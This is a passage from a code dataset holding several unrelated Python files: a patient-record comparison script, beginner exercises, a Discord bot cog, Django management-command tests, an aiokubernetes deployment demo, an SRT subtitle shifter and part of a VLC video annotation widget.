pd.to_datetime(merged_data['DATE_OF_BIRTH'],errors='coerce', format='%d/%m/%Y')\n #merged_data['ServDate'] = merged_data['ServDate'].dt.strftime('%d/%m/%Y')\n #rhino_report['encounter_date'] = rhino_report['encounter_date'].dt.strftime('%d/%m/%Y')\n #rhino_report['encounter_date'] = rhino_report['encounter_date'].str.replace(' ', '')\n #merged_data['ServDate'] = merged_data['ServDate'].str.replace(' ', '')\n #rhino_report['date_of_birth'] = rhino_report['date_of_birth'].str.slice(start = 0, stop = 10)\n rhino_report['date_of_birth'] = pd.to_datetime(rhino_report['date_of_birth'], errors='coerce')\n rhino_report['date_of_birth'] = rhino_report['date_of_birth'].dt.date\n merged_data['DATE_OF_BIRTH']= merged_data['DATE_OF_BIRTH'].dt.date\n\n start_date = datetime.strptime(start_date, '%d/%m/%Y')\n end_date = datetime.strptime(end_date, '%d/%m/%Y')\n\n rhino_report_date_filter = rhino_report[(rhino_report.encounter_date >= start_date) & (rhino_report.encounter_date <= end_date)]\n merged_data_date_filter = merged_data[(merged_data.ServDate >= start_date) & (merged_data.ServDate <= end_date)]\n\n merged_data_date_filter = merged_data_date_filter.rename(columns = {'ServDate':'encounter_date', 'DATE_OF_BIRTH':'date_of_birth','MEDICARE_NUMBER': 'medicare_number', 'FAMILY_NAME': 'last_name', 'GIVEN_NAME': 'first_name', 'HOME_ADDRESS_LINE_1': 'address_line1', 'HOME_SUBURB_TOWN':'suburb', 'HOME_POSTCODE': 'postcode', 'AGE': 'age_at_presentation'})\n\n rhino_report_date_filter = rhino_report_date_filter.drop(columns=['medicare_number'])\n\n indicator_values = {\"left_only\": \"In Rhino\", \"right_only\": \"In REDRC\", \"both\": \"In Both reports\"}\n new_df = rhino_report_date_filter.merge(merged_data_date_filter, on=['encounter_date','date_of_birth', 'first_name'] ,how='outer', indicator = True)\n new_df['_merge'] = new_df['_merge'].map(indicator_values)\n new_df.rename(columns= {'_merge':'Spreadsheet Location'}, inplace = True)\n #new_df = new_df.drop_duplicates(['encounter_date','date_of_birth','medicare_number'], keep='first')\n\n new_df = new_df.to_excel(f'{output_location}/comparison_output.xlsx', header = True)\n #rhino_report.to_csv('rhino.csv' , header = True)\n #merged_data.to_csv('test.csv', header=True)\n except:\n return False\n \n\n\n\n \n\n\n\n\n\n\n","repo_name":"rhys-rushton/patient-records-compare","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27182234804","text":"#1\ndef s1(num):\n return int(num) ** 2\nans = s1(\"10\")\n\n#2\ndef s2(num):\n print(str(num))\nans = s2(\"hello\")\n\n\n#3\ndef add(a,b,c,x=2, y=2):\n \"\"\"\n return 3 + 5 + 3.\n hissu 3\n opusyon 2\n : param x: int.\n : param y: int.\n : param z: int.\n \"\"\"\n return x + y\nans3 = add(3,5,2)\nprint(ans3)\n\n#4\ndef two(start):\n \"\"\"\n ans4_1 = integer / 2.\n : param ans4_1: int.\n : param integer: int.\n \"\"\"\n ans4_1 = start\n ans4_1 /= 2\n return ans4_1\ndef four(r):\n \"\"\"\n return = r * 4.\n \"\"\"\n \n r *= 4\n return r\n\nresult1 = two(40)\nprint(result1)\n\nresult2 = four(20)\nprint(result2)\n\nans4 = two(6)\nresult3 = four(ans4)\nprint(result3)\n\n\n#5\ndef change_float(num):\n \"\"\"\n try-except.\n change to float.\n \"\"\"\n try:\n A = float(num)\n return A\n except(ValueError):\n print(\"invalid input\")\n\n\n\n\nresult = change_float(\"Hello\")\nprint(result)\n\n\n","repo_name":"eeeeriri/challenge19","sub_path":"study4.py","file_name":"study4.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41415998674","text":"'''\nStarted to try to make the bot play music but I got a little tired late in the night\nI might try to finish it up later but my main concern right now is the scraper cog\n'''\n\nimport discord\nimport nacl\nimport asyncio\nfrom discord.ext import commands\n\nbot = commands.Bot(command_prefix='>')\n\nsongs = asyncio.Queue()\nplay_next_song = asyncio.Event()\n\n\nclass AudioBot(commands.Cog):\n playing = ''\n queue = []\n\n def __init__(self, bot):\n self.bot = bot\n\n @bot.command()\n async def join(self, ctx):\n channel = ctx.author.voice.channel\n await channel.connect()\n \n @bot.command()\n async def leave(self, ctx):\n await ctx.voice_client.disconnect()\n\n @bot.command(pass_context=True)\n async def play(self, ctx, url):\n try:\n channel = ctx.author.voice.channel\n await channel.connect()\n except:\n await ctx.send('Please join a channel first')\n\ndef setup(bot):\n bot.add_cog(AudioBot(bot))\n","repo_name":"lemmaandrew/Python","sub_path":"DiscordBot/cogs/AudioBot.py","file_name":"AudioBot.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31066656675","text":"import random\nfrom datetime import date\nfrom unittest.mock import patch\n\nimport vcr\nfrom click.testing import CliRunner\nfrom django.core.management import call_command\nfrom django.test import TestCase\n\nfrom core.management.commands.add_organizer import command as add_organizer\nfrom core.management.commands.copy_event import command as copy_event\nfrom core.management.commands.new_event import command as new_event\nfrom core.management.commands.prepare_dispatch import \\\n command as prepare_dispatch\nfrom core.models import Event\n\n\nclass CommandsTestCase(TestCase):\n fixtures = ['core_views_testdata.json', 'groups_testdata.json', 'pictures_testdata.json']\n\n def setUp(self):\n self.event_1 = Event.objects.get(pk=1) # In the future\n self.runner = CliRunner(echo_stdin=True)\n today = date.today()\n self.start_date = today.toordinal()\n self.end_date = today.replace(year=today.year+10).toordinal()\n\n def _get_random_day(self):\n return date.fromordinal(random.randint(self.start_date, self.end_date))\n\n @vcr.use_cassette('core/tests/vcr/update_coordinates.yaml')\n def test_update_coordinates(self):\n event_2 = Event.objects.get(pk=2)\n latlng = event_2.latlng\n event_2.latlng = None\n event_2.save()\n\n event_2 = Event.objects.get(pk=2)\n self.assertEqual(event_2.latlng, None)\n\n call_command('update_coordinates')\n\n event_2 = Event.objects.get(pk=2)\n self.assertEqual(event_2.latlng, latlng)\n\n @patch('core.models.user_invite')\n def test_add_organizer(self, mock_user_invite):\n event = Event.objects.get(pk=1)\n assert event.team.count() == 2\n\n command_input = (\n \"1\\n\"\n \"Jan Kowalski\\n\"\n \"jan@kowalski.example.org\\n\"\n \"N\\n\"\n )\n\n self.runner.invoke(\n add_organizer,\n input=command_input\n )\n event = Event.objects.get(pk=1)\n assert event.team.count() == 3\n\n @vcr.use_cassette('core/tests/vcr/new_event_with_one_organizer.yaml')\n def test_new_event_with_one_organizer(self):\n assert Event.objects.count() == 4\n\n random_day = self._get_random_day()\n\n command_input = (\n \"Oz\\n\"\n \"Neverland\\n\"\n \"{random_day}\\n\"\n \"oz\\n\"\n \"oz\\n\"\n \"Jan Kowalski\\n\"\n \"jan@kowalski.example.org\\n\"\n \"N\\n\"\n ).format(random_day=random_day.strftime(\"%d/%m/%Y\"))\n\n self.runner.invoke(\n new_event,\n input=command_input\n )\n assert Event.objects.count() == 5\n event = Event.objects.order_by('pk').last()\n assert event.team.count() == 1\n\n @vcr.use_cassette('core/tests/vcr/new_event_with_two_organizers.yaml')\n def test_new_event_with_two_organizers(self):\n assert Event.objects.count() == 4\n\n random_day = self._get_random_day()\n\n command_input = (\n \"Oz\\n\"\n \"Neverland\\n\"\n \"{random_day}\\n\"\n \"oz\\n\"\n \"oz\\n\"\n \"Jan Kowalski\\n\"\n \"jan@kowalski.example.org\\n\"\n \"Y\\n\"\n \"Eleanor Organizer\\n\"\n \"ealenor@organizer.example.org\\n\"\n \"N\"\n ).format(random_day=random_day.strftime(\"%d/%m/%Y\"))\n\n self.runner.invoke(\n new_event,\n input=command_input\n )\n assert Event.objects.count() == 5\n event = Event.objects.order_by('pk').last()\n assert event.team.count() == 2\n\n @vcr.use_cassette('core/tests/vcr/new_event_short.yaml')\n def test_new_event_short(self):\n assert Event.objects.count() == 4\n\n random_day = self._get_random_day()\n\n command_input = (\n \"Oz\\n\"\n \"Neverland\\n\"\n \"{random_day}\\n\"\n \"oz\\n\"\n \"oz\\n\"\n \"Jan Kowalski\\n\"\n \"jan@kowalski.example.org\\n\"\n \"N\\n\"\n ).format(random_day=random_day.strftime(\"%d/%m/%Y\"))\n\n result = self.runner.invoke(\n new_event,\n args=[\"--short\"],\n input=command_input\n )\n assert Event.objects.count() == 5\n short_email_body = \"\"\"Event e-mail is: oz@djangogirls.org\nEvent website address is: https://djangogirls.org/oz\"\"\"\n assert short_email_body in result.output\n\n def test_copy_event(self):\n assert Event.objects.count() == 4\n\n random_day = self._get_random_day()\n new_event_number = 2\n command_input = (\n \"2\\n\"\n \"{new_event_number}\\n\"\n \"{random_day}\\n\"\n ).format(random_day=random_day.strftime(\"%d/%m/%Y\"),\n new_event_number=new_event_number)\n\n self.runner.invoke(\n copy_event,\n input=command_input\n )\n old_event = Event.objects.get(pk=2)\n name = old_event.name.split('#')[0].strip()\n new_name = \"{} #{}\".format(name, new_event_number)\n try:\n new_event = Event.objects.get(name=new_name)\n except Event.DoesNotExist:\n self.fail(\"Event not copied properly!\")\n\n assert new_event.city == old_event.city\n assert new_event.team.count() == old_event.team.count()\n\n assert new_event.page_main_color == old_event.page_main_color\n assert new_event.content.count() == old_event.content.count()\n assert new_event.menu.count() == old_event.menu.count()\n\n def test_prepare_dispatch_with_data(self):\n today = date.today()\n start_date = today.replace(year=today.year-20).toordinal()\n end_date = today.toordinal()\n random_past_day = date.fromordinal(\n random.randint(start_date, end_date))\n\n command_input = (\n \"{random_past_day}\\n\"\n ).format(random_past_day=random_past_day.strftime(\"%Y-%m-%d\"))\n\n result = self.runner.invoke(\n prepare_dispatch,\n input=command_input\n )\n assert result.exception is None\n assert b'PREVIOUS EVENTS' in result.output_bytes\n\n def test_prepare_dispatch_without_data(self):\n start_date = date.today().toordinal()\n random_past_day = date.fromordinal(\n random.randint(start_date, start_date))\n\n command_input = (\n \"{random_past_day}\\n\"\n ).format(random_past_day=random_past_day.strftime(\"%Y-%m-%d\"))\n\n result = self.runner.invoke(\n prepare_dispatch,\n input=command_input\n )\n assert result.exception is None\n assert b'PREVIOUS EVENTS' in result.output_bytes\n\n def test_prepare_dispatch_wrong_date(self):\n start_date = date.today().toordinal()\n random_past_day = date.fromordinal(\n random.randint(start_date, start_date))\n\n command_input = (\n \"{random_past_day}\\n\"\n ).format(random_past_day=random_past_day.strftime(\"%Y/%m/%d\"))\n\n result = self.runner.invoke(\n prepare_dispatch,\n input=command_input\n )\n assert isinstance(result.exception, ValueError)\n assert b'PREVIOUS EVENTS' not in result.output_bytes\n","repo_name":"patjouk/djangogirls","sub_path":"core/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":7160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"50702954676","text":"#!/usr/bin/env python3\n\ndef dubbelen(l_namen):\n l_namen = l_namen[:]\n l_dubbelen = []\n for idx in range(1,len(l_namen)):\n naam = l_namen[idx]\n if idx > l_namen.index(naam):\n l_dubbelen.append(idx)\n return tuple(l_dubbelen)\n\ndef dubbelen2(l_namen):\n l_namen = l_namen[:]\n l_gevonden = []\n l_dubbelen = []\n for i, naam in enumerate(l_namen):\n if naam in l_gevonden:\n l_dubbelen.append(i)\n else:\n l_gevonden.append(naam)\n return tuple(l_dubbelen)\n\nnamen = [ 'jan', 'piet', 'henk', 'els', 'piet',\n 'els', 'john', 'els', 'jan', 'els', 'henk']\n\n# namen.sort()\n\nprint(\"De invoerlijst wordt:\", namen)\n\ndublist = dubbelen(namen)\n\nprint(dublist)\n\ndublist = dubbelen2(namen)\n\nprint(dublist)\n\n\n","repo_name":"markodraisma/python_3_daags_uitwerkingen","sub_path":"opgave13.py","file_name":"opgave13.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41282125351","text":"\"\"\"Test all components of `aiokubernetes`.\n\nThis script will create two async tasks. One will watch the namespaces and the\nother will create a login pod deployment, log into that Pod, issue commands\nwith and without an interactive Websocket connection and then delete the pod.\n\nNOTE: This is both a demo and an integration test. See the other examples for\nmore concise feature demonstrations.\n\"\"\"\nimport asyncio\nimport os\n\nimport aiohttp\nimport yaml\n\nimport aiokubernetes as k8s\n\n\nasync def watch_resource(request):\n async for event in k8s.watch.AioHttpClientWatch(request):\n print(f\"{event.name} {event.obj.kind} {event.obj.metadata.name}\")\n\n\nasync def create_deployment(proxy, client):\n img_alpine_34, img_alpine_35 = 'alpine:3.4', 'alpine:3.5'\n time_between_steps = 3\n\n # Load the manifest with a valid Python/Alpine container deployment.\n base_path = os.path.dirname(os.path.abspath(__file__))\n fname = os.path.join(base_path, 'manifests/create-deployment.yaml')\n body = yaml.safe_load(open(fname, 'r'))\n name, namespace = body['metadata']['name'], body['metadata']['namespace']\n img_orig = body['spec']['template']['spec']['containers'][0]['image']\n del fname\n\n # Assign a specific container image (we will later replace that container\n # and re-deploy to illustrate the workflow).\n body['spec']['template']['spec']['containers'][0]['image'] = img_alpine_34\n img_new = body['spec']['template']['spec']['containers'][0]['image']\n print(f'Replaced <{img_orig}> with <{img_new}>')\n\n # ----------------------------------------------------------------------\n # Create the namespace .\n # ----------------------------------------------------------------------\n manifest = {\n 'apiVersion': 'v1',\n 'kind': 'Namespace',\n 'metadata': {'name': namespace},\n }\n cargs = k8s.api.CoreV1Api(proxy).create_namespace(body=manifest)\n ret = await client.request(**cargs)\n if ret.status == 201:\n print(f'Namespace <{namespace}> created')\n elif ret.status == 409:\n print(f'Namespace <{namespace}> already exists')\n else:\n print(f'Error {ret.status}')\n print(await ret.text())\n\n # -------------------------------------------------------------------------\n # Create Deployment\n # -------------------------------------------------------------------------\n k8s_v1beta = k8s.ExtensionsV1beta1Api(proxy)\n print(f'Creating deployment {name}...')\n cargs = k8s_v1beta.create_namespaced_deployment(body=body, namespace=namespace)\n http = await client.request(**cargs)\n print(' ->', http.method, http.status, http.url)\n del cargs, http\n\n # -------------------------------------------------------------------------\n # Patch Deployment\n # -------------------------------------------------------------------------\n # print(f'Patching deployment {name}...')\n # fname = os.path.join(base_path, 'manifests/patch-deployment.yaml')\n # body_patch = yaml.safe_load(open(fname, 'r'))\n # resp = await k8s_v1beta.patch_namespaced_deployment(\n # name=name, namespace=namespace, body=body_patch)\n # await asyncio.sleep(time_between_steps)\n\n # -------------------------------------------------------------------------\n # Search For The Login Pod\n # -------------------------------------------------------------------------\n print(f'\\nConnecting to a login pod: ', end='', flush=True)\n\n # Try several times to connect to the pod. We have to do this because we\n # only just created the pod and it takes a few seconds until it is ready.\n for i in range(300):\n # Get a list of all pods.\n cargs = k8s.CoreV1Api(proxy).list_namespaced_pod(namespace)\n http = await client.request(**cargs)\n pods = k8s.swagger.unpack(await http.read())\n\n # Find all running pods whose name starts with 'login'.\n pods = [_ for _ in pods.items if _.metadata.name.lower().startswith('login')]\n pods = [_ for _ in pods if _.status.phase.lower() == 'running']\n\n # Briefly wait before looking for a suitable pod, unless we already found one.\n if http.status != 200 or len(pods) == 0:\n print('.', end='', flush=True)\n await asyncio.sleep(0.1)\n continue\n print('\\n ->', http.method, http.status, http.url, '\\n')\n del cargs, http\n\n # Could be a stale deployment - not a problem, but let user know.\n if len(pods) > 1:\n print('Found multiple login pods')\n\n # Extract the pod name that we will connect to.\n login_pod_name = pods[0].metadata.name\n print(f'Connecting to Pod <{login_pod_name}>')\n break\n else:\n login_pod_name = None\n print('No login has entered \"running\" state yet: skip connection test')\n\n # -------------------------------------------------------------------------\n # Execute Command in Login Pod via GET request.\n # -------------------------------------------------------------------------\n if login_pod_name is not None:\n print('\\nNon-interactive Websocket')\n # Connect to the pod and print something to the terminal.\n cargs = k8s.CoreV1Api(api_client=proxy).connect_get_namespaced_pod_exec(\n login_pod_name, namespace,\n command=['/bin/sh', '-c', 'echo Hello World'],\n stderr=True, stdin=True, stdout=True, tty=True\n )\n\n # Tell K8s that this is a Websocket, not a GET.\n cargs['headers']['sec-websocket-protocol'] = 'v4.channel.k8s.io'\n url = k8s.api_client.get_websocket_url(cargs['url'])\n\n # Connect the Websocket and consume the Websocket until Kubernetes closes it.\n ws_session = client.ws_connect(url, headers=cargs['headers'])\n async with ws_session as ws:\n async for msg in ws:\n chan, msg = msg.data[0], msg.data[1:]\n print(f' Websocket Channel {chan}: {msg}')\n del cargs, url, ws_session\n\n # -------------------------------------------------------------------------\n # Use interactive Websocket to execute commands in Login Pod\n # -------------------------------------------------------------------------\n if login_pod_name is not None:\n print('\\nInteractive Websocket')\n\n # Connect to the pod and issue a single command to spawn a shell. We\n # will then use a websocket to send commands to that shell.\n wargs = k8s.CoreV1Api(api_client=proxy).connect_get_namespaced_pod_exec(\n login_pod_name, namespace,\n command=['/bin/sh'],\n stderr=True, stdin=True, stdout=True, tty=True\n )\n\n # Tell K8s that this is a Websocket, not a GET.\n wargs['headers']['sec-websocket-protocol'] = 'v4.channel.k8s.io'\n url = k8s.api_client.get_websocket_url(wargs['url'])\n\n # Connect the Websocket and consume the Websocket until Kubernetes closes it.\n ws_session = client.ws_connect(url, headers=wargs['headers'])\n async with ws_session as ws:\n # The \\x00 prefix denotes `stdin`, which is where we need to send\n # the command to. The rest is just a sequence of two shell commands.\n await ws.send_bytes(b'\\x00' + b'ls --color=never /\\nexit\\n')\n\n # Read until we receive something on channel 3 to tell us that this was it.\n async for msg in ws:\n chan, msg = msg.data[0], msg.data[1:]\n print(f' Websocket Channel {chan}: {msg}')\n\n # -------------------------------------------------------------------------\n # Replace Deployment\n # -------------------------------------------------------------------------\n img_orig = body['spec']['template']['spec']['containers'][0]['image']\n body['spec']['template']['spec']['containers'][0]['image'] = img_alpine_35\n img_new = body['spec']['template']['spec']['containers'][0]['image']\n print(f'Replaced <{img_orig}> with <{img_new}>')\n\n print(f'\\nReplacing deployment {name}...')\n cargs = k8s_v1beta.replace_namespaced_deployment(name, namespace, body=body)\n http = await client.request(**cargs)\n assert isinstance(http, aiohttp.client_reqrep.ClientResponse)\n print(' ->', http.method, http.status, http.url)\n del cargs, http\n\n # -------------------------------------------------------------------------\n # Delete Deployment\n # -------------------------------------------------------------------------\n await asyncio.sleep(time_between_steps)\n print(f'\\nDeleting deployment {name}...')\n del_opts = k8s.V1DeleteOptions(\n api_version='v1', kind='DeleteOptions', grace_period_seconds=0,\n propagation_policy='Foreground',\n )\n cargs = k8s_v1beta.delete_namespaced_deployment(name, namespace, body=del_opts)\n http = await client.request(**cargs)\n assert isinstance(http, aiohttp.client_reqrep.ClientResponse)\n print(' ->', http.method, http.status, http.url)\n del cargs, http\n\n print('------------ End of Demo ------------')\n\n\nasync def setup():\n config = k8s.utils.load_config(warn=False)\n client = k8s.clients.get_aiohttp(config)\n proxy = k8s.api_proxy.Proxy(config)\n\n # Specify and dispatch the tasks.\n cargs = k8s.CoreV1Api(proxy).list_namespace(watch=True, timeout_seconds=1)\n tasks = [\n create_deployment(proxy, client),\n watch_resource(client.request(**cargs)),\n ]\n await asyncio.gather(*tasks)\n\n print('\\nShutting down')\n await client.close()\n\n\ndef main():\n # Setup event loop and setup the program.\n loop = asyncio.get_event_loop()\n loop.run_until_complete(asyncio.ensure_future(setup()))\n loop.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"olitheolix/aiokubernetes","sub_path":"examples/all_in_one.py","file_name":"all_in_one.py","file_ext":"py","file_size_in_byte":9885,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"16"} +{"seq_id":"35668595787","text":"import pytest\n\nfrom slsdet import Mythen3GainCapsWrapper\nfrom slsdet.enums import M3_GainCaps #this is the c++ enum\n\n\ndef test_comapre_with_int():\n c = Mythen3GainCapsWrapper(128) #C10pre\n assert c == 128\n assert c != 5\n assert c != 1280\n\ndef test_compare_with_other():\n a = Mythen3GainCapsWrapper(128)\n b = Mythen3GainCapsWrapper(1<<10)\n c = Mythen3GainCapsWrapper(128)\n assert a!=b\n assert (a==b) == False\n assert a==c\n\ndef test_can_be_default_constructed():\n c = Mythen3GainCapsWrapper() \n assert c == 0\n\n","repo_name":"slsdetectorgroup/slsDetectorPackage","sub_path":"python/tests/test_m3gaincaps.py","file_name":"test_m3gaincaps.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"} +{"seq_id":"6157162714","text":"import re\nimport sys, getopt\n\ndef longtfm2sec(timestr):\n t = timestr.split(\":\")\n sec = int(t[0])*3600 + int(t[1])*60 + float(t[2].replace(',','.'))\n return (sec)\n\ndef sec2longtfm(sec):\n dm = divmod(sec,3600) \n jam = str(round(dm[0])).zfill(2)\n dm = divmod(dm[1],60) \n mnt = str(round(dm[0])).zfill(2)\n dtk = str('%.3f' % dm[1]).zfill(6).replace('.',',')\n return (\"%s:%s:%s\" % (jam, mnt, dtk))\n\ndef main(srtfile, shift):\n \n # namafile = 'Outlander S01E09.srt'\n try:\n f= open(srtfile,\"r\")\n if f.mode == \"r\":\n fout= open(srtfile.replace('.srt','_new.srt'), \"w\")\n f1 = f.readlines()\n reg = re.compile('\\d\\d\\:\\d\\d:\\d\\d\\,\\d\\d\\d --> \\d\\d:\\d\\d:\\d\\d,\\d\\d\\d')\n for i in f1:\n m = reg.match(i)\n if m:\n t = i.split(\" --> \")\n t1 = longtfm2sec(t[0]) + shift\n t2 = longtfm2sec(t[1]) + shift\n fout.write(sec2longtfm(t1) + ' --> ' + sec2longtfm(t2) + '\\n')\n else:\n fout.write(i)\n fout.close()\n f.close()\n print ('Output file: ' + srtfile.replace('.srt','_new.srt'))\n except FileNotFoundError:\n print('Error read file',srtfile)\n\nif __name__== \"__main__\":\n if len(sys.argv) == 1:\n print ('Command syntax:')\n print ('run.py -h -i -s ' )\n sys.exit(2)\n try:\n opts, args = getopt.getopt(sys.argv[1:],\"hi:s:\")\n except getopt.GetoptError:\n print ('run.py -i -s ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print ('run.py -i -s ')\n sys.exit()\n if opt == '-i':\n ifile = (arg)\n if opt == '-s':\n shift = int(arg)\n \n main(ifile, shift)\n\n","repo_name":"miidev/srtshifter","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27412321454","text":"import threading\nimport time\nimport psutil\nfrom io import BytesIO\nimport cv2\nimport subprocess\nimport numpy as np\nfrom boto.s3.connection import S3Connection\nfrom boto.exception import S3ResponseError\nfrom logging import getLogger\nfrom global_finprint import Extent\nfrom .play_state import PlayState\nfrom .highlighter import Highlighter\nfrom .context_menu import ContextMenu, EventDialog\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom threading import Thread\nfrom threading import Event as PyEvent\nfrom tempfile import gettempdir\nfrom .vlc import *\nfrom .vlc_utils import *\nfrom win32api import GetSystemMetrics\n\n\nPROGRESS_UPDATE_INTERVAL = 30000\nVIDEO_WIDTH = 800 # make this more adjustable\nVIDEO_HEIGHT = 450\nMIN_VIDEO_WIDTH = 544 # make this more adjustable\nMIN_VIDEO_HEIGHT = 306\nDEFAULT_ASPECT_RATIO = 16.0 / 9.0\nAWS_BUCKET_NAME = 'finprint-annotator-screen-captures'\nSCREEN_CAPTURE_QUALITY = 25 # 0 to 100 (inclusive); lower is small file, higher is better quality\nTEMP_SNAPSHOT_DIR = 'finprint-snapshot'\n\nSEEK_CLOCK_FACTOR = 30\nSEEK_FRAME_JUMP = 60\n\nVIDEOFRAME_INDEX = 0\nANNOTATION_INDEX = 1\n\ncreds = open('./credentials.csv').readlines()[1].split(',')\nAWS_ACCESS_KEY_ID = creds[1].strip()\nAWS_SECRET_ACCESS_KEY = creds[2].strip()\n\n\nclass RepeatingTimer(QObject):\n timerElapsed = pyqtSignal()\n\n def __init__(self, interval):\n super(RepeatingTimer, self).__init__()\n self.interval = interval\n self.active = False\n self.shutdown_event = PyEvent()\n self.thread = None\n\n def wrapper_function(self):\n self.active = True\n self.shutdown_event.clear()\n while self.active:\n if self.shutdown_event.wait(timeout=self.interval):\n self.active = False\n else:\n self.timerElapsed.emit()\n\n def start(self):\n self.thread = Thread(group=None, target=self.wrapper_function, daemon=True)\n self.thread.start()\n\n def cancel(self):\n self.shutdown_event.set()\n\nclass TimerVO :\n def __init__(self, dur):\n ''' Duration of current timer in seconds '''\n self.timer_duration_ms = dur\n\n\nclass AnnotationImage(QWidget):\n def __init__(self):\n QWidget.__init__(self)\n self.highlighter = Highlighter()\n self._pressed = False\n self._dragging = False\n self.curr_image = None\n self.can_update = True\n self.initUI()\n\n def initUI(self):\n self.show()\n\n def clear(self):\n self.curr_image = None\n self.clearExtent()\n\n def clearExtent(self):\n self.highlighter.clear()\n\n def set_rect(self, rect):\n self.highlighter.set_rect(rect)\n self.repaint()\n\n def get_rect(self):\n return self.highlighter.get_rect()\n\n def mousePressEvent(self, event):\n if self.can_update:\n self._pressed = True\n self.highlighter.start_rect(event.pos())\n self.update()\n\n def mouseMoveEvent(self, event):\n if self.can_update:\n if self._pressed: # If mouse was earlier pressed, then this mouse move is actually a DRAG\n self._dragging = True\n x, y = event.pos().x(), event.pos().y()\n clamped_pos = QPoint(min(x, self.width()), min(y, self.height()))\n self.highlighter.set_rect(clamped_pos)\n self.update()\n\n def mouseReleaseEvent(self, event):\n if self._dragging:\n self._dragging = False\n self.update()\n self.parent().context_menu()\n\n def paintEvent(self, e):\n # This should only be called when\n if self.curr_image is not None:\n painter = QPainter()\n painter.begin(self)\n painter.drawImage(QPoint(0, 0), self.curr_image)\n painter.setPen(QPen(QBrush(Qt.green), 1, Qt.SolidLine))\n painter.drawRect(self.highlighter.get_rect())\n painter.end()\n\n\nclass VlcVideoWidget(QStackedWidget):\n playStateChanged = pyqtSignal(PlayState)\n progressUpdate = pyqtSignal(int)\n playbackSpeedChanged = pyqtSignal(float)\n\n def __init__(self, parent=None, onPositionChange=None, fullscreen=False):\n QWidget.__init__(self, parent)\n self._capture = None\n self._paused = True\n self._play_state = PlayState.NotReady\n self._file_name = None\n self._fullscreen = fullscreen\n self._dragging = False\n self._highlighter = Highlighter()\n self._onPositionChange = onPositionChange\n self._extent_rect = None\n self._duration = 0\n # XXX hacks for image filtering\n self.current_snapshot = None\n self.saturation = 0\n self.brightness = 0\n self.contrast = False\n self.retry_count = 0\n\n # We will pass a window handle to libvlc, which\n # will be responsible for the actual rendering of the video\n if sys.platform == \"darwin\": # for MacOS\n self.videoframe = QMacCocoaViewContainer(0)\n else:\n self.videoframe = QFrame()\n\n # add the videoframe\n self.addWidget(self.videoframe)\n\n # XXX Fixme - this is a hack\n if not self._fullscreen:\n if GetSystemMetrics(1) > 800 :\n self.setMinimumSize(VIDEO_WIDTH, VIDEO_HEIGHT)\n self.setMaximumSize(VIDEO_WIDTH, VIDEO_HEIGHT)\n else :\n self.setMinimumSize(MIN_VIDEO_WIDTH, MIN_VIDEO_HEIGHT)\n self.setMaximumSize(MIN_VIDEO_WIDTH, MIN_VIDEO_HEIGHT)\n\n # add the annotation image\n self.annotationImage = AnnotationImage()\n self.addWidget(self.annotationImage)\n\n # set videoframe as default visibile widget\n self.setCurrentIndex(VIDEOFRAME_INDEX)\n\n # XXX todo - get aspect ratio from vlc when played\n self._aspect_ratio = DEFAULT_ASPECT_RATIO\n\n # temporary storage for vlc snapshots\n self.temp_snapshot_dir = os.path.join(gettempdir(), TEMP_SNAPSHOT_DIR)\n\n if not os.path.exists(self.temp_snapshot_dir):\n os.makedirs(self.temp_snapshot_dir)\n\n # bind instance to load libvlc. This is where we pass parameters for\n # startup, like buffering and vlc specific debug and logging params\n startup_args = get_vlc_params()\n self.instance = Instance(startup_args)\n # create a vlc media player from loaded library\n self.mediaplayer = self.instance.media_player_new()\n\n # This keeps track of how far the annotator has gotten in the video\n self._last_progress = 0\n\n self._timer_flag = False\n self.timer_time = time.perf_counter()\n self._timer = RepeatingTimer(0.25)\n self._timer.timerElapsed.connect(self.on_timer)\n # Initialize timer value object with 0 ms\n self.timer_vo = TimerVO(0)\n\n self._context_menu = None\n self._current_set = None\n\n # current observation rect to display\n self._observation_rect = None\n\n self.setStyleSheet('QMenu { background-color: white; }')\n\n # XXX Todo - move ui components into a initUI\n self.initUI()\n\n def initUI(self):\n pass\n\n def _print_sys_info(self):\n l = getLogger('finprint')\n p = psutil.Process()\n l.debug('System CPU %: {}'.format(psutil.cpu_percent()))\n l.debug('System Memory: {}'.format(psutil.virtual_memory()))\n l.debug('Process CPU %: {}'.format(p.cpu_percent()))\n l.debug('Process Threads: {}'.format(p.threads()))\n l.debug('Process Memory: {}'.format(p.memory_info()))\n l.debug('Process Memory %: {}'.format(p.memory_percent()))\n\n def load_set(self, set):\n self._current_set = set\n self._context_menu = ContextMenu(set, parent=self)\n self._context_menu.itemSelected.connect(self.onMenuSelect)\n\n def onMenuSelect(self, optDict):\n if optDict is not None:\n print(\"vlc_video_widget > onMenuSelect\")\n optDict['event_time'] = int(self.get_position())\n optDict['extent'] = self.get_highlight_extent().to_wkt()\n optDict['set'] = self._current_set\n diag = EventDialog(parent=self)\n diag.finished.connect(self.clear_extent)\n screen_center = QApplication.desktop().screenGeometry().center()\n x = screen_center.x() - diag.rect().center().x()\n y = screen_center.y() - 200\n getLogger('finprint').debug('Send dialog to {0}, {1}'.format(x, y))\n diag.move(x, y)\n diag.launch(optDict)\n else:\n self.clear_extent()\n\n # listen for any spacebar or mousedown event for play/pause\n def eventFilter(self, obj, evt):\n if evt.type() == QEvent.KeyPress and obj.__class__ != 